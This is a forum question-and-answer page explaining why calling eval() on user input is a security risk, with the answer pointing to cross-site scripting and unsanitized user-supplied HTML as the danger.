Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.
Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.
Lost your password? Please enter your email address. You will receive a link and will create a new password via email.
Please briefly explain why you feel this question should be reported.
Please briefly explain why you feel this answer should be reported.
Please briefly explain why you feel this user should be reported.
I read about the security implications of eval() however there is something I don’t get. Imagine a worst case scenario in where eval() is compiling an input box. A hacker could type anything on it and it would get run, but in modern browsers eg: Chrome couldn’t he do exactly the same from the console anyway?
Sure, but the user’s goal is not to steal his own data.
The danger is that someone else succeed in bringing the malicious code somewhere he knows that an eval will occur on the user’s page.
An attack exploiting such an issue is called Cross Site Scripting
An other similar security issue is directly appending HTML which might contain a script tag. For example if you do that while implementing a forum, and the users are allowed to write HTML without any restrictions, they can have script tags executing in other user’s pages.